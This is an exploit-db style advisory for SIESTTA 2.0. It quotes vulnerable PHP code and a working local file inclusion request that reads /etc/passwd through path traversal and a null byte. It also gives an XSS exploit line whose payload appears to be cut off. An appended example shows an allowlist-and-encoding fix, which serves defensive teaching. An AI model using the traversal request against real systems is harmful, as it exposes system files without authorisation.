SIESTTA 2.0 – Local File Inclusion / Cross-Site Scripting

  • Author: JosS
    Date: 2010-04-16
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12260/
  • ####################################################################
    # SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities
    # download: http://ramoncastro.es/siestta_old/
    #
    # Author: Jose Luis Gongora Fernandez 'aka' JosS
    # mail: sys-project[at]hotmail[dot]com
    # site: http://www.hack0wn.com/
    # team: Spanish Hackers Team - [SHT]
    #
    # Hack0wn Security Project!!
    #
    # This was written for educational purposes. Use it at your own risk.
    # Author will not be responsible for any damage.
    #
    ####################################################################
    #
    # "need" register_globals = On
    #
    ####################################################################
    
    
    - [#LFI] <login.php>
    
    <?php
    
    require('idioma/'.$idioma.'');
    ...
    ?>
    
    !EXPLOIT: /login.php?idioma=/../../../../../../../../../../../etc/passwd%00
    
    - [#XSS] <carga_foto_al.php>
    
    <?
    ...
    $usuario = $_GET['usuario'];
    $imagen = 'admin/fotos_al/'.$usuario.'.jpg';
    echo '<p style="text-align:center;">
    <img class="foto" src="'.$imagen.'" alt="'.$usuario.'" /></p>
    ...
    ?>
    
    !EXPLOIT: /carga_foto_al.php?usuario=
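
A hardened form of the two snippets above, as an added example (not SIESTTA's code and not part of the original advisory). The function names, the language file names and the username pattern are assumptions; the sample inputs at the end are constructed.

```php
<?php
// Added example: function names, file names and the username pattern are assumptions.

// login.php: pick the language file from an allowlist instead of
// concatenating a request-controlled value into require().
function siestta_language_file($requested)
{
    // Hypothetical allowlist; list the files actually shipped in idioma/.
    $allowed = ['es' => 'es.php', 'en' => 'en.php'];
    $key = is_string($requested) ? $requested : '';
    // Anything not in the map (traversal sequences, NUL bytes, absolute
    // paths, arrays) falls back to the default and never reaches the path.
    $file = $allowed[$key] ?? $allowed['es'];
    return __DIR__ . '/idioma/' . $file;
}

// carga_foto_al.php: validate the identifier, then encode it for each
// output context (URL path segment, HTML attribute).
function siestta_photo_markup($usuario)
{
    // Assumed username format: letters, digits, underscore, hyphen, 1-32 chars.
    if (!is_string($usuario) || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $usuario)) {
        return '<p style="text-align:center;">Invalid user</p>';
    }
    $esc = function ($s) {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    };
    $src = 'admin/fotos_al/' . rawurlencode($usuario) . '.jpg';
    return '<p style="text-align:center;">'
         . '<img class="foto" src="' . $esc($src) . '" alt="' . $esc($usuario) . '" /></p>';
}

// Read the superglobal explicitly so behaviour does not depend on register_globals:
//   login.php:          require siestta_language_file($_GET['idioma'] ?? null);
//   carga_foto_al.php:  echo siestta_photo_markup($_GET['usuario'] ?? null);

// Constructed inputs, run from the CLI to see the fallback and the encoding.
echo siestta_language_file('/../../../etc/passwd'), "\n";
echo siestta_language_file('en'), "\n";
echo siestta_photo_markup('a"b<c'), "\n";
echo siestta_photo_markup('alumno_01'), "\n";
```

The allowlist removes the dependency on `register_globals` being off and on the PHP version's handling of `%00`, since the request value is only ever used as a lookup key.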